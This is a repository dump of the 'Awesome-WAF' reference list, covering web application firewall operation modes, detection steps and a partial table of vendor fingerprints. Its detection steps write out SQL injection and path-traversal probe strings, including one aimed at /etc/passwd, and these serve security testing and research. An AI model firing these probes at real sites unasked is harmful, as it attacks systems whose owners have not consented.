Repository: 0xInfection/Awesome-WAF
Branch: master
Commit: 8cdeddb29095
Files: 7
Total size: 213.7 KB
Directory structure:
gitextract_qiof5t2g/
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── others/
│ ├── README.md
│ └── obfu.py
└── papers/
└── Beyond SQLi - Obfuscate and Bypass WAFs.txt
================================================
FILE CONTENTS
================================================
================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at theinfecteddrake@gmail.com. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq
================================================
FILE: CONTRIBUTING.md
================================================
I appreciate and recognize [all contributors](https://github.com/0xInfection/awesome-waf/graphs/contributors).
> First of all thank you for even considering of contributing to this awesome list. __"The community just learns from each other"__.
## Table of Contents
- [Contribution guidelines](#contribution-guidelines)
- [Quality Standard](#quality-standard)
- [Adding to this list](#adding-to-this-list)
- [Adding something to an awesome list](#adding-something-to-an-awesome-list)
- [Updating your Pull Request](#updating-your-pull-request)
## Contribution Guidelines
__Your pull request/commit message will be a tweet, please keep that in mind.__ :)
- **To add to the list:** Submit a pull request.
- **To remove from the list:** Submit a pull request.
- Want to change something: Submit a pull request.
- Want to try something else: Submit a pull request.
- Don't know what to do: Submit a pull request or open an issue, let me know what's going on.
[Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind.
- If you are submitting a new fingerprint, include the headers/page source, etc.
- Do not include the URL as it may expose the integrity of the site.
> I will contact you personally if necessary via email.
- Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!).
- The link should be the name of the slide or project or website.
- Description should be clear and concise (read it out loud to be sure).
- Description should follow the link, on the same line.
- if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged.
Please contribute links to slides/tools you have used or are familiar with. This will help ensure high-quality entries.
## Quality Standard
Note that we can help you achieve those standards, just try your best, be brave.
We'll guide you to the best of our abilities.
To be on the list, it would be *nice* if entries adhere to these quality standards:
- Generally useful to the community.
- Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person.
- Solves a real problem (even a small one)
- If your PR is a **WIP** (work in progress, not safe for production), mention it.
If your PR is not merged, I will tell you why so that you may be able to improve it.
## Contribution Guidelines
### Adding to this List
Please ensure your pull request adheres to the following guidelines:
- Search previous suggestions before making a new one, as yours may be a duplicate.
- Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description.
- Make an individual pull request for each suggestion.
- Use [title-casing](http://titlecapitalization.com) (AP style).
- Use the following format: `[List Name](link)`
- Link additions should be added to the bottom of the relevant category.
- New categories or improvements to the existing categorization are welcome.
- Check your spelling and grammar.
- Make sure your text editor is set to remove trailing whitespace.
- The pull request and commit should have a useful title.
- The body of your commit message should contain a link to the repository.
Thank you for your contributions!
### Adding something to an Awesome List
If you have something awesome to contribute to an awesome list, this is how you do it.
You'll need a [GitHub account](https://github.com/join)!
1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome
2. Click on the `readme.md` file:

3. Now click on the edit icon.

4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/).

5. Say why you're proposing the changes, and then click on "Propose file change".

6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)!
### Updating your Pull Request
Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines.
[Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that.
================================================
FILE: LICENSE
================================================
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "{}"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright {yyyy} {name of copyright owner}
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================================================
FILE: README.md
================================================
# Awesome WAF [](https://github.com/0xinfection/awesome-waf)
Everything about web application firewalls (WAFs) from a security perspective. 🔥
>
> __Foreword:__ This was originally my own collection on WAFs. I am open-sourcing it in the hope that it will be useful for pentesters and researchers out there.As the saying goes, "the community just learns from each other."

__A Concise Definition:__ A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. *(Source: [PCI DSS IS 6.6](https://www.pcisecuritystandards.org/documents/information_supplement_6.6.pdf))*
A web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it.
Feel free to [contribute](CONTRIBUTING.md).
### Contents:
- [Introduction](#introduction)
- [How WAFs Work](#how-wafs-work)
- [Operation Modes](#operation-modes)
- [Testing Methodology](#testing-methodology)
- [Where To Look](#where-to-look)
- [Detection Techniques](#detection-techniques)
- [WAF Fingerprints](#waf-fingerprints)
- [Evasion Techniques](#evasion-techniques)
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
- [Regex Reversing](#regex-reversing)
- [Obfuscation/Encoding](#obfuscation)
- [Browser Bugs](#browser-bugs)
- [HTTP Header Spoofing](#request-header-spoofing)
- [Google Dorks Approach](#google-dorks-approach)
- [Known Bypasses](#known-bypasses)
- [Awesome Tooling](#awesome-tools)
- [Fingerprinting](#fingerprinting)
- [Testing](#testing)
- [Evasion](#evasion)
- [Blogs & Writeups](#blogs-and-writeups)
- [Video Presentations](#video-presentations)
- [Research Presentations & Papers](#presentations--research-papers)
- [Research Papers](#research-papers)
- [Presentation Slides](#presentations)
- [Licensing & Credits](#credits--license)
## Introduction:
### How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
### Operation Modes:
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block requests that are clearly malicious. The signatures of WAFs operating in a negative model are specifically crafted to prevent attacks which exploit certain web application vulnerabilities. Blacklisting model web application firewalls are a great choice for web applications exposed to the public internet and are highly effective against major vulnerabilities. Eg. Rule for blocking all `` inputs prevent basic cross-site scripting attacks.
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking potential large scale attacks, but will also block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet. A good scenario can be when web-application is facing the public internet (use blacklists) while the admin panel needs to be exposed to only a subset of users (use whitelists).
## Testing Methodology:
### Where To Look:
- Always look out for common ports that expose that a WAF, namely `80`, `443`, `8000`, `8080` and `8888` ports. However, its important to note that a WAF can be easily deployed on any port running a HTTP service. It is good to enumerate HTTP service ports first hand and then look for WAFs.
- Some WAFs set their own cookies in requests (e.g. Citrix Netscaler, Yunsuo WAF).
- Some associate themselves with separate headers (e.g. Anquanbao WAF, Amazon AWS WAF).
- Some often alter headers and jumble characters to confuse attacker (e.g. Netscaler, Big-IP).
- Some expose themselves in the `Server` header (e.g. Approach, WTS WAF).
- Some WAFs expose themselves in the response content (e.g. DotDefender, Armor, Sitelock).
- Other WAFs reply with unusual response codes upon malicious requests (e.g. WebKnight, 360 WAF).
### Detection Techniques:
To identify WAFs, we need to (dummy) provoke it.
1. Make a normal GET request from a browser, intercept and record response headers (specifically cookies).
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
3. Make GET requests to random open ports and grab banners which might expose the WAFs identity.
4. On login pages, inject common (easily detectable) payloads like `" or 1 = 1 --`.
5. Inject noisy payloads like `` into search bars, contact forms and other input fields.
6. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.
7. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.
8. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
9. Many a times, the WAF varies the `Server` header upon different types of interactions.
10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
11. Side Channel Attacks - Examine the timing behaviour of the request and response content.
> __Tip:__ More details can be found in a [blogpost here](https://0xinfection.github.io/posts/fingerprinting-wafs-side-channel/).
## WAF Fingerprints
Wanna fingerprint WAFs? Lets see how.
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#evasion-techniques).
| WAF |
Fingerprints |
|
360
|
- Detectability: Easy
- Detection Methodology:
- Returns status code
493 upon unusual requests.
- Blockpage may contain reference to
wzws-waf-cgi/ directory.
- Blocked response page source may contain:
- Reference to
wangshan.360.cn URL.
Sorry! Your access has been intercepted because your links may threaten website security. text snippet.
- Response headers may contain
X-Powered-By-360WZB header.
- Blocked response headers contain unique header
WZWS-Ray.
Server header may contain value qianxin-waf.
|
|
aeSecure
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response content contains
aesecure_denied.png image (view source to see).
- Response headers contain
aeSecure-code value.
|
|
Airlock
|
- Detectability: Moderate/Difficult
- Detection Methodology:
Set-Cookie headers may contain:
AL-SESS cookie field name (case insensitive).
AL-LB value (case insensitive).
- Blocked response page contains:
Server detected a syntax error in your request text.
Check your request and all parameters text snippet.
|
|
AlertLogic
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains:
We are sorry, but the page you are looking for cannot be found text snippet.
The page has either been removed, renamed or temporarily unavailable text.
404 Not Found in red letters.
|
|
Aliyundun
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains:
Sorry, your request has been blocked as it may cause potential threats to the server's security text snippet.
- Reference to
errors.aliyun.com site URL.
- Blocked response code returned is
405.
|
|
Anquanbao
|
- Detectability: Easy
- Detection Methodology:
- Returns blocked HTTP response code
405 upon malicious requests.
- Blocked response content may contain
/aqb_cc/error/ or hidden_intercept_time.
- Response headers contain
X-Powered-by-Anquanbao header field.
|
|
Anyu
|
- Detectability: Easy
- Detection Methodology:
- Blocked response content contains
Sorry! your access has been intercepted by AnYu
- Blocked response page contains
AnYu- the green channel text.
- Response headers may contain unusual header
WZWS-RAY.
|
|
Approach
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page content may contain:
Approach Web Application Firewall Framework heading.
Your IP address has been logged and this information could be used by authorities to track you. warning.
Sorry for the inconvenience! keyword.
Approach infrastructure team text snippet.
Server header has field value set to Approach.
|
|
Armor Defense
|
- Detectability: Easy
- Detection Methodology:
- Blocked response content contains:
This request has been blocked by website protection from Armor text.
If you manage this domain please create an Armor support ticket snippet.
|
|
ArvanCloud
|
- Detectability: Easy
- Detection Methodology:
Server header contains ArvanCloud keyword.
|
|
ASPA
|
- Detectability: Easy
- Detection Methodology:
Server header contains ASPA-WAF keyword.
- Response contain unique header
ASPA-Cache-Status with content HIT or MISS.
|
|
ASP.NET Generic
|
- Detectability: Moderate
- Detection Methodology:
- Response headers may contain
X-ASPNET-Version header value.
- Blocked response page content may contain:
This generic 403 error means that the authenticated user is not authorized to use the requested resource.
Error Code 0x00000000< keyword.
X-Powered-By header has field value set to ASP.NET.
|
|
Astra
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page content may contain:
Sorry, this is not allowed. in h1.
our website protection system has detected an issue with your IP address and wont let you proceed any further text snippet.
- Reference to
www.getastra.com/assets/images/ URL.
- Response cookies has field value
cz_astra_csrf_cookie in response headers.
|
|
AWS ELB
|
- Detectability: Moderate
- Detection Methodology:
- Response headers might contain:
AWSALB cookie field value.
X-AMZ-ID header.
X-AMZ-REQUEST-ID header.
- Response page may contain:
Access Denied in their keyword.
- Request token ID with length from 20 to 25 between
RequestId tag.
Server header field contains awselb/2.0 value.
|
|
Baidu Yunjiasu
|
- Detectability: Moderate
- Detection Methodology:
Server header may contain Yunjiasu-nginx value.
Server header may contain Yunjiasu value.
|
|
Barikode
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page content contains:
BARIKODE keyword.
Forbidden Access text snippet in h1.
|
|
Barracuda
|
- Detectability: Moderate
- Detection Methodology:
- Response cookies may contain
barra_counter_session value.
- Response headers may contain
barracuda_ keyword.
- Response page contains:
You have been blocked heading.
You are unable to access this website text.
|
|
Bekchy
|
- Detectability: Easy
- Detection Methodology:
- Blocked response headers contains
Bekchy - Access Denied.
- Blocked response page contains reference to
https://bekchy.com/report.
|
|
BinarySec
|
- Detectability: Moderate
- Detection Methodology:
- Response headers contain:
X-BinarySec-Via field.
X-BinarySec-NoCache field.
Server header contains BinarySec keyword.
|
|
BitNinja
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page may contain:
Security check by BitNinja text snippet.
your IP will be removed from BitNinja.
Visitor anti-robot validation text snippet.
(You will be challenged by a reCAPTCHA page) text.
|
|
BIG-IP ASM
|
- Detectability: Moderate
- Detection Methodology:
- Response headers may contain
BigIP or F5 keyword value.
- Response header fields may contain
X-WA-Info header.
- Response headers might have jumbled
X-Cnection field value.
|
|
BlockDos
|
- Detectability: Moderate
- Detection Methodology:
Server header contains value BlockDos.net.
|
|
Bluedon IST
|
- Detectability: Easy
- Detection Methodology:
Server header contains BDWAF field value.
- Blocked response page contains to
Bluedon Web Application Firewall text snippet..
|
|
BulletProof Security Pro
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response page contains:
div with id as bpsMessage text snippet.
If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page. text snippet.
|
|
CDN NS Application Gateway
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains
CdnNsWAF Application Gateway text snippet.
|
|
Cerber (WordPress)
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains:
We're sorry, you are not allowed to proceed text snippet.
Your request looks suspicious or similar to automated requests from spam posting software warning.
|
|
Chaitin Safeline
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains
event_id keyword within HTML comments.
|
|
ChinaCache
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
Powered-by-ChinaCache field.
|
|
Cisco ACE XML Gateway
|
- Detectability: Moderate
- Detection Methodology:
Server header has value ACE XML Gateway set.
|
|
Cloudbric
|
- Detectability: Moderate
- Detection Methodology:
- Response content contains:
Malicious Code Detected heading.
Your request was blocked by Cloudbric text snippet.
- Reference to
https://cloudbric.zendesk.com URL.
Cloudbric Help Center text.
- Page title starting with
Cloudbric | ERROR!.
|
|
Cloudflare
|
- Detectability: Easy
- Detection Methodology:
- Response headers might have
cf-ray field value.
Server header field has value cloudflare.
Set-Cookie response headers have __cfuid= cookie field.
- Page content might have
Attention Required! or Cloudflare Ray ID:.
- Page content may contain
DDoS protection by Cloudflareas text.
- You may encounter
CLOUDFLARE_ERROR_500S_BOX upon hitting invalid URLs.
|
|
CloudfloorDNS
|
- Detectability: Easy
- Detection Methodology:
Server header field has value CloudfloorDNS WAF.
- Block-page title might have
CloudfloorDNS - Web Application Firewall Error.
- Page content may contain
www.cloudfloordns.com/contact URL as a contact link.
|
|
Cloudfront
|
- Detectability: Easy
- Detection Methodology:
- Blocked response content contains
Generated by cloudfront (CloudFront) error upon malicious request.
|
|
Comodo cWatch
|
- Detectability: Easy
- Detection Methodology:
Server header contains Protected by COMODO WAF value.
|
|
CrawlProtect
|
- Detectability: Easy
- Detection Methodology:
- Response cookies might contain
crawlprotect cookie name.
- Block Page title has
CrawlProtect keyword in it.
- Blocked response content contains value
This site is protected by CrawlProtect !!! upon malicious request.
|
|
Deny-All
|
- Detectability: Difficult
- Detection Methodology:
- Response content contains value
Condition Intercepted.
Set-Cookie header contains cookie field sessioncookie.
|
|
Distil Web Protection
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain field value
X-Distil-CS in all requests.
- Blocked response page contains:
Pardon Our Interruption... heading.
You have disabled javascript in your browser. text snippet.
Something about your browser made us think that you are a bot. text.
|
|
DoSArrest Internet Security
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain field value
X-DIS-Request-ID.
Server header contains DOSarrest keyword.
|
|
DotDefender
|
- Detectability: Easy
- Detection Methodology:
- Blocked response content contains value
dotDefender Blocked Your Request.
- Blocked response headers contain
X-dotDefender-denied field value.
|
|
DynamicWeb Injection Check
|
- Detectability: Easy
- Detection Methodology:
- Blocked response headers contain
X-403-Status-By field with value dw-inj-check value.
|
|
e3Learning Security
|
- Detectability: Easy
- Detection Methodology:
Server header contains e3Learning_WAF keyword.
|
|
EdgeCast (Verizon)
|
- Detectability: Easy
- Detection Methodology:
- Blocked response content contains value
Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon).
- Blocked response code returns
400 Bad Request on malicious requests.
|
|
Eisoo Cloud
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page content may contain:
/eisoo-firewall-block.css reference.
www.eisoo.com URL.
© (year) Eisoo Inc. keyword.
Server header has field value set to EisooWAF-AZURE/EisooWAF.
|
|
Expression Engine
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page returns
Invalid URI generally.
- Blocked response content contains value
Invalid GET Request upon malicious GET queries.
- Blocked POST type queries contain
Invalid Data in response content.
|
|
F5 ASM
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response content contains warning
The requested URL was rejected. Please consult with your administrator.
|
|
FortiWeb
|
- Detectability: Moderate
- Detection Methodology:
- Response headers contain
FORTIWAFSID= on malicious requests.
- Blocked response page contains:
- Reference to
.fgd_icon image icon.
Server Unavailable! as heading.
Server unavailable. Please visit later. as text.
|
|
GoDaddy
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains value
Access Denied - GoDaddy Website Firewall.
|
|
GreyWizard
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains:
Grey Wizard as title.
Contact the website owner or Grey Wizard text snippet.
We've detected attempted attack or non standard traffic from your IP address text snippet.
Server header contain greywizard keyword.
|
|
Huawei Cloud
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains:
- Reference to
account.hwclouds.com/static/error/images/404img.jpg error image.
- Reference to
www.hwclouds.com URL.
- Reference to
hws_security@{site.tld} e-mail for reporting.
|
|
HyperGuard
|
- Detectability: Difficult
- Detection Methodology:
Set-Cookie header has cookie field ODSESSION= in response headers.
|
|
IBM DataPower
|
- Detectability: Difficult
- Detection Methodology:
- Response headers contains field value value
X-Backside-Transport with value OK or FAIL.
|
|
Imperva Incapsula
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page content may contain:
Powered By Incapsula text snippet.
Incapsula incident ID keyword.
_Incapsula_Resource keyword.
subject=WAF Block Page keyword.
- Normal GET request headers contain
visid_incap value.
- Response headers may contain
X-Iinfo header field name.
Set-Cookie header has cookie field incap_ses and visid_incap.
|
|
Imunify360
|
- Detectability: Easy
- Detection Methodology:
Server header contain imunify360-webshield keyword.
- Response page contains:
Powered by Imunify360 text snippet.
imunify360 preloader if response type is JSON.
- Blocked response page contains
protected by Imunify360 text.
|
|
IndusGuard
|
- Detectability: Moderate
- Detection Methodology:
Server header contains value IF_WAF.
- Blocked response content contains warning
further investigation and remediation with a screenshot of this page.
- Response headers contain a unique header
X-Version.
|
|
Instart DX
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
X-Instart-Request-ID unique header.
- Response headers contain
X-Instart-WL unique header fingerprint.
- Response headers contain
X-Instart-Cache unique header fingerprint.
- Blocked response page contains
The requested URL was rejected. Please consult with your administrator. text.
|
|
ISA Server
|
- Detectability: Difficult
- Detection Methodology:
- Response page contains:
The ISA Server denied the specified Uniform Resource Locator (URL) text snippet.
The server denied the specified Uniform Resource Locator (URL). Contact the server administrator. text snippet
|
|
Janusec Application Gateway
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page has image displaying
JANUSEC name and logo.
- Blocked response page displays
Janusec Application Gateway on malicious requests.
|
|
Jiasule
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains reference to
static.jiasule.com/static/js/http_error.js URL.
Set-Cookie header has cookie field __jsluid= or jsl_trackingin response headers.
Server header has jiasule-WAF keywords.
- Blocked response content has
notice-jiasule keyword.
|
|
KeyCDN
|
- Detectability: Easy
- Detection Methodology:
Server header contains KeyCDN keyword.
|
|
KnownSec
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page displays
ks-waf-error.png image (view source to see).
|
|
KONA Site Defender (Akamai)
|
- Detectability: Easy
- Detection Methodology:
Server header contains AkamaiGHost keyword.
|
|
LiteSpeed
|
- Detectability: Easy
- Detection Methodology:
Server header has value set to LiteSpeed.
Response page contains:
Proudly powered by LiteSpeed Web Server text.
- Reference to
http://www.litespeedtech.com/error-page
Access to resource on this server is denied.
|
|
Malcare
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response page may contains:
Blocked because of Malicious Activities text snippet.
Firewall powered by MalCare text snippet.
|
|
MissionControl Application Shield
|
- Detectability: Easy
- Detection Methodology:
Server header field contains Mission Control Application Shield value.
|
|
ModSecurity
|
- Detectability: Moderate/Difficult
- Detection Methodology:
- Blocked response page contains:
This error was generated by Mod_Security text snippet.
One or more things in your request were suspicious text snippet.
rules of the mod_security module text snippet.
mod_security rules triggered text snippet.
- Reference to
/modsecurity-errorpage/ directory.
Server header may contain Mod_Security or NYOB keywords.
- Sometimes, the response code to an attack is
403 while the response phrase is ModSecurity Action.
|
|
